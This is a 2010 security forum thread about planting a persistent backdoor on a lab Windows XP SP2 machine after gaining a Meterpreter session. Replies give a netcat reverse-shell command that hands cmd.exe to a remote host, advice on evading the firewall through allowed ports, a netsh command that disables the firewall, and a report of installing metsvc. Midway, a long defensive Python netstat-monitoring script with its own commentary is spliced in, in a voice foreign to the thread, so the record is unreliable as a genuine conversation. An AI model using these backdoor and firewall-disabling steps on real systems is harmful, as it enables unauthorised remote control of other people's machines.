c0r (posted September 8, 2010, edited):

I'm trying to create a backdoor on a virtual XP SP2 machine with the firewall enabled. I managed to get a Meterpreter session on the machine. I tried to install metsvc, but it fails to bind. I also tried to install netcat and open a port using the netsh command in Windows, but the port doesn't open. Any other ideas?

c

PS: this is all practised in my virtual lab.
Infiltrator (posted September 8, 2010):

Hi c0r,

In order to create a reverse shell with netcat you will need to do the following.

On your host, you have to listen for an incoming connection (thanks to -v, you'll get a quick note as soon as the shell connects):

    netcat -v -l -p 3333

On the remote host, the following command has to be executed in order to establish a connection to your host:

    netcat -e cmd.exe yourhost 3333

Try the above; if it doesn't work, let me know.

Regards,
Infiltrator
c0r (author, posted September 8, 2010):

I tried this howto, Persistent netcat backdoor, but the firewall doesn't allow the connection!

c
chikpee (posted September 8, 2010, edited):

Are you trying port 455 (the one that the tutorial you posted used as an example) or some other port? My first instinct is that the Windows firewall is blocking any unused port by default. So you could either try to get your netcat backdoor to work over an allowed port (like 80, 8080, 443, etc.) or put a rule into the firewall to explicitly allow incoming/outgoing traffic on the port of your choice.

I have the OpenBSD version of netcat (which is now the default version that Ubuntu comes with) and it won't let you use any of the first 1024 ports without root access. Not sure if the Windows version is the same or not.
c0r (author, posted September 8, 2010):

I'm trying port 455... yes... gonna try 4444 or something else... thanks for the hint!

c
Infiltrator (posted September 8, 2010):

> I tried this howto, Persistent netcat backdoor, but the firewall doesn't allow the connection!
> c

That's kind of interesting, because when I created a reverse shell with netcat on my VMs I was able to get a reverse shell, even with the firewall turned on. Maybe you should try using the TCP ports mentioned (80, 443).
chikpee (posted September 8, 2010):

While we're on the subject of netcat... anyone know why the OpenBSD version (as I said above, now also the standard version packaged with Ubuntu) dropped the "-e" option?
hexophrenic (posted September 9, 2010):

> I'm trying to create a backdoor on a virtual XP SP2 machine with the firewall enabled. I managed to get a Meterpreter session on the machine. I tried to install metsvc, but it fails to bind. I also tried to install netcat and open a port using the netsh command in Windows, but the port doesn't open. Any other ideas?
> c
> PS: this is all practised in my virtual lab.

Use netsh from the CLI. A quick Google produced: http://www.windowsnetworking.com/articles_...s-Firewall.html
c0r (author, posted September 9, 2010):

@hexophrenic: tried the netsh command... did not work. If you look at the Metasploit Unleashed howto you will see they use the netsh command.

@Infiltrator: so you're saying it works! I'll have another go then...

c
hexophrenic (posted September 9, 2010):

    netsh firewall set opmode mode=DISABLE

will disable the firewall. You can entirely control the firewall via the CLI (assuming GP is absent) with appropriate local privs, or with GP if DA rights are available. What error message did you get?
c0r (author, posted September 9, 2010, edited):

None... that's the weird part... I'm trying it out on a newly installed XP SP2 now.

Okay... I'm trying this on a fresh XP SP2 version. I don't get any errors; the firewall adds the exceptions without any problem. But when I try to connect with netcat to port 139 it times out.

    nc -v 192.168.1.102 139
    192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out
    (UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open

On the Windows machine I see the connection

    TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED

for a short time... then it times out. Any ideas?

c
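The netstat row quoted above is the kind of evidence a defender would look at after a lab exercise like this one: a listener on an unexpected port, or an established session to a port that a reverse-shell listener typically uses, stands out in `netstat -an` output. The following script is an added example written for this thread, not code from any poster or tool mentioned here. It parses netstat-style rows (the constructed sample below mirrors the Windows layout, including the line c0r observed) and flags listeners outside a hypothetical per-host baseline, sessions to the listener ports the thread uses (3333, 4444), and sessions with peers outside an assumed trusted lab subnet.

```python
import re
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional, Tuple

# Matches the fixed-width rows "netstat -an" prints on Windows, e.g.
#   TCP    192.168.1.102:139      192.168.1.106:44169    ESTABLISHED
#   UDP    0.0.0.0:445            *:*
LINE_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\d+|\*)(?:\s+(\S+))?\s*$"
)


@dataclass(frozen=True)
class Socket:
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: Optional[int]   # None for the "*:*" foreign address of UDP rows
    state: str                   # "" for UDP rows, which carry no state column


def parse_netstat(text: str) -> List[Socket]:
    """Turn netstat -an output into Socket records; header/blank lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, lip, lport, rip, rport, state = m.groups()
        sockets.append(Socket(proto, lip, int(lport), rip,
                              None if rport == "*" else int(rport), state or ""))
    return sockets


# Hypothetical baseline for one lab workstation (an assumption, tune per host):
# services it is expected to expose, and the subnet its peers should come from.
EXPECTED_LISTENERS = {135, 139, 445}
TRUSTED_NETS = [ip_network("192.168.1.0/24")]
# Listener ports used in this thread's netcat examples; a session to one of them
# from a workstation is worth a look.
WATCHED_REMOTE_PORTS = {3333, 4444}


def _trusted(ip: str) -> bool:
    try:
        addr = ip_address(ip)
    except ValueError:           # "*" or a hostname that netstat resolved
        return False
    return any(addr in net for net in TRUSTED_NETS)


def find_suspicious(sockets: List[Socket]) -> List[Tuple[Socket, str]]:
    """Return (socket, reason) pairs for TCP sockets that deviate from the baseline."""
    findings = []
    for s in sockets:
        if s.proto != "TCP":
            continue
        if s.state == "LISTENING" and s.local_port not in EXPECTED_LISTENERS:
            findings.append((s, "listener on a port outside the host baseline"))
        elif s.state == "ESTABLISHED":
            if s.remote_port in WATCHED_REMOTE_PORTS:
                findings.append((s, "session to a watched port (reverse-shell pattern)"))
            elif not _trusted(s.remote_ip):
                findings.append((s, "session with a peer outside the trusted network"))
    return findings


# Constructed sample in the Windows netstat -an layout; the 139 row is the one
# quoted in the thread, the others are made up for the example.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING
  TCP    192.168.1.102:139      192.168.1.106:44169    ESTABLISHED
  TCP    192.168.1.102:1055     10.9.8.7:3333          ESTABLISHED
  TCP    192.168.1.102:139      10.0.0.5:50000         ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

if __name__ == "__main__":
    for sock, reason in find_suspicious(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{sock.local_ip}:{sock.local_port} -> {sock.remote_ip}:{sock.remote_port} "
              f"[{sock.state}]: {reason}")
```

On a real host you would feed it the saved output of `netstat -an` taken before and after the exercise; the 139 session from the trusted peer is left alone, while the 4444 listener and the outbound session to port 3333 are exactly the traces a netsh exception or a disabled firewall would let through.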
Infiltrator (posted September 10, 2010, edited):

> None... that's the weird part... I'm trying it out on a newly installed XP SP2 now.
> Okay... I'm trying this on a fresh XP SP2 version. I don't get any errors; the firewall adds the exceptions without any problem. But when I try to connect with netcat to port 139 it times out.
>     nc -v 192.168.1.102 139
>     192.168.1.102: inverse host lookup failed: Unknown server error : Connection timed out
>     (UNKNOWN) [192.168.1.102] 139 (netbios-ssn) open
> On the Windows machine I see the connection
>     TCP 192.168.1.102:139 192.168.1.106:44169 ESTABLISHED
> for a short time... then it times out. Any ideas?
> c

What you need to ensure is that you have one shell listening for incoming connections and the other shell making the outbound connection. So, on the computer that you wish to turn off the monitor, it should be making the connection out. And on the computer from which you are going to remotely control it, have it set to listen.

If all else fails, watch this video.
c0r (author, posted September 13, 2010):

Got it to work. Thanks for the tips! After the Meterpreter session I disabled the Windows firewall, then installed metsvc. Installing netcat also worked.

c